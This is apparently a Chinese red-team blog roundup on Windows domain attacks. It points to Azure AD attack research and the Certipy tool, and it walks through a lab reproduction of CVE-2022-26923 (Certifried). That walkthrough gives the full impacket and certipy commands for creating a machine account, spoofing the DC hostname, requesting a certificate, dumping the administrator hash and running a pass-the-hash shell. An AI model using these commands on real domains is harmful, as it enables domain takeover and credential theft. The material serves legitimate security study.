JDArmy Blog

蓝军技术推送-windows域专题(Azure、ADCS)

字数统计: 1.2k阅读时长: 4 min
2022/05/13

windows域无疑是microsoft公司的一个伟大的产品。windows 域是微软为了方便日常管理和安全边界划分,从而提出的一种概念。在windows域中,所有的用户账户、计算机、打印机都会注册到一个或多个域控(中央计算机集群的中央数据库)中。域控会根据不同用户基于组来对域中的资源分配不同的访问权限。并从windows server 2000开始,通过Active Directory组件来负责对域控中的用户管理中央数据库进行维护,windows Active Directory的前生是微软的NOS(Network Operating System)。而第一个NOS是在1990年随着windows NT 3.0一起发布,直到1997年才以Active Directory的身份首次发布,因此AD的最早可以追溯到1990年。
关于Windows域历史的更多细节可以看:https://www.oreilly.com/library/view/active-directory-4th/9780596155179/ch01.html
因为windows域中有域控这种中央集权系统,它往往会是入侵者的主要目标,也是防守者的重点保护目标。在企业中,直接控制域控的难度较大,并因为Windows域的复杂性,在实战中,通常需要通过windows域内的其他组件和服务来获取权限。在Windows域渗透中,除了常常关注的一些安全相关的漏洞外,还有哪些域内的正常功能呢?哪些功能又能被我们利用呢?本专题将通过网上一些优质的文章、漏洞来了解一些windows域中的其它功能。

[文章推荐] Attacking Azure,Azure AD,and Introducing PowerZure

文章看点:Azure是微软的一个在线服务平台,此平台最初仅提供PaaS(平台即服务),后又发展成为,IaaS(基础架构即服务)和SaaS(软件即服务)。在企业中,主要方便企业人员使用包括微软office 365在内的一些微软功能。为了使用这些功能,企业运维人员需要通过将Azure和本地的AD连接,使包括office 365的微软功能能进行身份认证。

此文章结合XPN、Dirk-jan等前人的研究,总结了Azure的相关功能,及利用方法。

推送亮点:微软Azure在许多企业中都有出现,在渗透中,也曾因为对其相关功能不了解导致权限的丢失,此文章详细介绍了微软Azure的相关攻击面。同时,Azure也是能直接攻击域控的一种方式,目前已经将此方法同步至github。

原文链接https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a

其他Azure相关链接https://blog.xpnsec.com/azuread-connect-for-redteam/

https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf

[漏洞播报] CVE-2022-26923(ADCS域提权漏洞)

漏洞概述:ADCS服务在windows域中,充当Microsoft的公钥基础结构PKI实现,主要提供windows证书相关的功能,包括证书的注册、分发、管理等功能。并且在windows域中,也能通过证书来进行kerebros认证。

此漏洞受Nopac利用思路的影响,将Nopac中Kerberos认证相关的问题,转向证书认证相关的问题。此漏洞通过将机器账户dNSHostName属性的值修改成与域控一样的方法,来获取域控的机器账户hash,从而获取域控的DCSync权限(目前已经将此方法同步至github)

漏洞复现
1、创建机器账号

1
python3 addcomputer.py 'qwe.local/user:Qweqwe123' -method LDAPS -computer-name 'USERPC' -computer-pass 'Qweqwe123'


2、查看新建机器账号属性

利用LDAP browser工具,以普通域账号登录,查看新建USERPC$的账号属性。

3、删除域控所识别的SPN

4、伪造域控机器名

在Domain Controllers组中查看域控机器名,并修改新建用户的dNSHostName为域控机器名。

5、使用机器账号模版申请新证书

1
certipy req 'qwe.local/USERPC$:[email protected]' -ca CA -template Machine


6、利用新证书通过Kerberos 的 PKINIT 协议扩展获取用户hash

1
certipy auth -pfx suger0bfa.pfx


7、利用DC机器用户hash dump域管hash

1
python3 secretsdump.py qwe.local/suger0bfa\$@SUGER0BFA.qwe.local -hashes 0:693d3438cf76c79eafd1ee5c2dfa0e77 -just-dc-user administrator


成功获取DC权限

1
python3 wmiexec.py qwe.local/[email protected] whoami -hashes aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24


漏洞链接https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
其他ADCS相关链接https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://posts.specterops.io/certified-pre-owned-d95910965cd2

[安全工具] Certity

功能描述:windows ADCS滥用利用工具,通过此工具,可以结合impacket,在linux下对ADCS进行相关攻击。

推送亮点:ADCS漏洞学习工具,相比于windows端的工具,python类的windows工具对漏洞利用原理会更加深刻(无法调用win32 api)。此攻击也是adcs域提权漏洞利用的主要工具。

工具链接https://github.com/ly4k/Certipy

CATALOG
  1. 1. [文章推荐] Attacking Azure,Azure AD,and Introducing PowerZure
  2. 2. [漏洞播报] CVE-2022-26923(ADCS域提权漏洞)
  3. 3. [安全工具] Certity